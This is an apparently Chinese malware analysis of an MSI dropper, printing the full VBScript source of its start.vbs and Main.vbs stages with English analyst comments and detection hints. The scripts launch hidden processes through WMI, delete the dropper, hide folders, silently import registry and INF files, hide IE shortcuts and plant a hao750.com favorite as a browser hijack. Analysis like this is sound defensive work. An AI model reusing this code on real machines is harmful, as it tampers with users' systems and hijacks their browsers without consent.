很强悍的病毒,这个病毒必须被运行起来才会生效。运行后释放脚本文件和流氓软件。
比如:文件名:5575.msi
行为:在 D 盘释放 AliIM.exe、AliWangWang.exe、Main.vbs、copy.inf、
MyAddreg.inf、MyAddreg.reg、sefix.exe、start.vbs 等文件。
start.vbs 内容为:
'// start.vbs, first stage: launch the next process through WMI (Win32_Process.Create)
'// instead of WScript.Shell.Run, so the child is not parented by this wscript.exe.
'// (Original comment: "parent process is svchost.exe, call the exe" -- in practice the
'// parent of a WMI-created process is the WMI provider host; confirm on the analysed
'// system. A wscript.exe whose parent is the WMI host is a useful detection signal.)
'=======================================================================
Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
'// No arguments: connects to the local machine, default namespace.
Set objSWbemServices = objSWbemLocator.ConnectServer()
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
'// Intended to keep the new process window hidden. 12 lies outside the documented
'// SW_* range (0-11) for Win32_ProcessStartup.ShowWindow, so the actual effect is unverified.
objConfig.ShowWindow = 12
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
'========================================================================
'// Second stage: run Main.vbs (dropped under D:\MyDocument per the description above).
'// errResult receives the Create() return code and processId the new PID; neither is checked,
'// and the path is not quoted, so it relies on having no spaces.
errResult = objSWbemObject.Create("wscript.exe D:\MyDocument\Main.vbs" , Null, objConfig, processId)
'=======================================================
function killme()
'// Original comment: "kill msi and me". Best-effort deletion of the file whose path is
'// passed on this script's command line (per that comment, most likely the dropper MSI;
'// no self-deletion of start.vbs is visible in this body). All WScript arguments are
'// joined with a trailing space, the final space is trimmed, and the result is handed to
'// FileSystemObject.DeleteFile. No return value.
'// Errors are swallowed by On Error Resume Next, so a locked or missing file fails silently.
on error resume next
Dim szBuf
For Each Arg In WScript.Arguments
szBuf =szBuf & Arg & " "
Next
'// Guard against running with no or very short arguments (would otherwise try to delete "").
if len(szBuf)>=5 then
'// 5 s delay, presumably to let the process that launched this script release the file -- confirm.
Wscript.sleep 5000
With CreateObject("Scripting.FileSystemObject")
'// left(..., len-1) drops the trailing space added in the loop above.
.DeleteFile left(szBuf,len(szBuf)-1)
End With
end if
end function
'=======================================================
'// Force-kill any running AliIM.exe (a file of that name is also among the dropped
'// files listed above) before cleanup; spawned hidden through WMI like the launch above.
'// The return code in errResult is ignored.
errResult = objSWbemObject.Create("taskkill /f /im AliIM.exe" , Null, objConfig, processId)
'// Delete the path given on the command line (see killme), then fall off the end of the script.
killme
Main.vbs内容为:
'// Main.vbs, second stage: resolves the shell folders it will tamper with, then sets up
'// the same hidden WMI process launcher used by start.vbs. Every error is suppressed.
on error resume next
Dim FSO,WshShell,strDesktop,strQuick,strStartmenu,myfile,oShellLink,strStart,strAllDesk
dim objShell,objFolder,objFolderItem,strDesktopFld
dim f,files
Dim processId, errResult
Dim objSWbemLocator, objSWbemServices, objStartup, objConfig, objSWbemObject
'// Resolve paths. Note: strDesktop, strAllDesk, strStartmenu and strQuick are only referenced
'// by commented-out code further down; strStart, strAllStart and oShellLink are unused here.
'========================================================================================
Set WshShell = WScript.CreateObject("WScript.Shell")
'// All Users desktop -- hard-coded to the Chinese-localised XP/2003 profile layout
'// ("桌面" = Desktop), which suggests the intended victim platform.
strAllDesk="C:\Documents and Settings\All Users\桌面\"
'// Current user's desktop
strDesktop = WshShell.SpecialFolders("Desktop")
'// Quick Launch bar
strQuick=WshShell.ExpandEnvironmentStrings("%APPDATA%") & "\Microsoft\Internet Explorer\Quick Launch"
'// All Users Start menu
strStartmenu = WshShell.SpecialFolders("AllUsersStartMenu")
'// Current user's Startup folder
strStart=WshShell.SpecialFolders("Startup") & "\"
'// All Users Startup folder (never declared with Dim; legal without Option Explicit)
strAllStart=WshShell.SpecialFolders("AllUsersStartUp") & "\"
'// Favorites folder via Shell.Application (Namespace(6) is the Favorites special folder).
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(6)
Set objFolderItem = objFolder.Self
strDesktopFld = objFolderItem.Path & "\"
'==========================================================================================
'// FileSystemObject used by deletelnk and faver below
'=========================================================
Set FSO = CreateObject("scripting.filesystemobject")
'=========================================================
'// Hidden WMI process launcher, identical to the one in start.vbs. Original comment:
'// "parent process is svchost.exe, call the exe" (see note there on the actual parent).
'=======================================================================
Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objSWbemLocator.ConnectServer()
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
'// Intended to hide the window; 12 is outside the documented 0-11 range, effect unverified.
objConfig.ShowWindow = 12
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
'========================================================================
'// Delete shortcuts of the given types from a folder.
'============================================================================================
function deletelnk(strPath)
'// strPath: folder to scan (not validated; errors are hidden by On Error Resume Next).
'// Removes every *.url file in the folder, plus any *.lnk whose lower-cased name
'// contains one of the competing-browser markers below: "internet" (Internet Explorer),
'// 世界之窗 (TheWorld), Mozilla Firefox, 腾讯tt (Tencent TT), 谷歌浏览器 (Google Chrome),
'// Opera, 傲游浏览器 (Maxthon). lcase has no effect on the Chinese substrings.
'// Non-recursive; `file` is an undeclared loop variable. No return value.
'// In this listing every call site (strQuick/strDesktop/strAllDesk/strStartmenu) is
'// commented out, so the function is dormant here.
Set f=FSO.GetFolder(strPath)
Set files=f.files
For Each file In files
if right(lcase(file.name),3)="url" then
FSO.deletefile strPath & "\" & file.name
end if
if right(lcase(file.name),3)="lnk" then
if instr(lcase(file.name),"internet")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"世界之窗")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"mozilla firefox")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"腾讯tt")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"谷歌浏览器")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"opera")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"傲游浏览器")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
end if
Next
end function
'============================================================================================
'// Add an entry to the user's Favorites.
'==========================================================================================
function faver(a,b)
'// a: display name of the favorite (becomes "<a>.url" under the Favorites folder);
'// b: target URL written into the [InternetShortcut] file. No return value.
'// Skipped when "<a>.url" already exists, so the entry is added at most once.
if FSO.FileExists(strDesktopFld & a & ".url")=false then
'// Written first as "<a>.txt". The third argument `ture` is an undeclared name (Empty),
'// so the unicode flag is effectively not set -- presumably an ANSI file; verify.
Set myfile=FSO.CreateTextFile( strDesktopFld & a & ".txt" ,,ture)
myfile.WriteLine "[InternetShortcut]"
myfile.WriteLine "URL=" & b
myfile.Close
'// The .txt is then renamed to .url through a hidden cmd.exe launched via WMI rather than
'// with FSO. The source path is quoted but the target name is not, so `a` must not contain spaces.
errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & strDesktopFld & a & ".txt" & """" & " " & a & ".url" , Null, objConfig, processId)
end if
End function
'==========================================================================================
'// Original comment: "set up its own lock" -- applies the dropped registry/INF files.
'// What they change is not visible on this page (myaddreg.reg/.inf and copy.inf are not listed).
'==========================================================================================
function locks(a,b,c)
'// a: path of an INF whose DefaultInstall section is run; b: path of a .reg file to import;
'// c: folder (with trailing backslash) containing copy.inf. No return value; every WMI
'// Create() result is ignored and paths are passed unquoted.
'// Silent (/s) registry import. On NT5 regedt32.exe forwards to regedit -- confirm on target OS.
errResult = objSWbemObject.Create("regedt32.exe /s " & b, Null, objConfig, processId)
'// Run the INF's DefaultInstall section through advpack (rundll32), a common
'// living-off-the-land install vector worth alerting on.
errResult = objSWbemObject.Create("RunDll32.exe advpack.dll,LaunchINFSection " & a & ",DefaultInstall", Null, objConfig, processId)
'// Give the INF install time to finish before the next one (no result is checked).
Wscript.sleep 3000
'// Commented-out (inactive) earlier approach: appears to rename the Quick Launch folder,
'// copy an "Internet Explorer.lnk" from c into it, and rename it back.
'errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & strQuick & """" & " a", Null, objConfig, processId)
'errResult = objSWbemObject.Create("cmd.exe /c copy " & """" & c & "Internet Explorer.lnk" & """" & " " & """" & replace(strQuick,"Quick Launch","a") & "\Internet Explorer.lnk" & """", Null, objConfig, processId)
'errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & replace(strQuick,"Quick Launch","a") & """" & " " & """" & "Quick Launch" & """", Null, objConfig, processId)
'// Second INF install: <c>copy.inf, DefaultInstall section.
errResult = objSWbemObject.Create("RunDll32.exe advpack.dll,LaunchINFSection " & c & "copy.inf,DefaultInstall", Null, objConfig, processId)
End function
'==========================================================================================
'// Main flow of Main.vbs.
'// "Clean up the desktop": shmgrate.exe OCInstallHideIE is the Windows verb that hides the
'// Internet Explorer shortcuts (as Add/Remove Windows Components does), run hidden via WMI.
errResult = objSWbemObject.Create("shmgrate.exe OCInstallHideIE", Null, objConfig, processId)
Wscript.sleep 3000
'// Shortcut deletion in Quick Launch, both desktops and the Start menu is commented out in
'// this version (see deletelnk).
'deletelnk strQuick
'deletelnk strDesktop
'deletelnk strAllDesk
'deletelnk strStartmenu
'// Hide the drop folders (system + hidden + read-only + archive). Both paths, and the
'// log.jse path below, are host indicators for this sample; the D:\360SE contents are not shown.
errResult = objSWbemObject.Create("attrib +s +h +r +a " & """" & "D:\360SE" & """", Null, objConfig, processId)
errResult = objSWbemObject.Create("attrib +s +h +r +a " & """" & "D:\MyDocument" & """", Null, objConfig, processId)
'// Add a Favorites entry named "网-址-之-家" (a navigation-site name broken up with dashes)
'// pointing at hao750.com -- the browser-hijack payoff. Only added if not already present.
faver "网-址-之-家","http://www.hao750.com/"
'// Import the dropped .reg/.inf files (see locks); their contents are not on this page.
locks "D:\MyDocument\myaddreg.inf","D:\MyDocument\myaddreg.reg","D:\MyDocument\"
'// Optional third stage: run log.jse if something (not shown here) has placed it under
'// Common Files\Windows. Path is quoted this time.
if FSO.FileExists("C:\Program Files\Common Files\Windows\log.jse") then
errResult = objSWbemObject.Create("wscript.exe " & """" & "C:\Program Files\Common Files\Windows\log.jse" & """", Null, objConfig, processId)
end if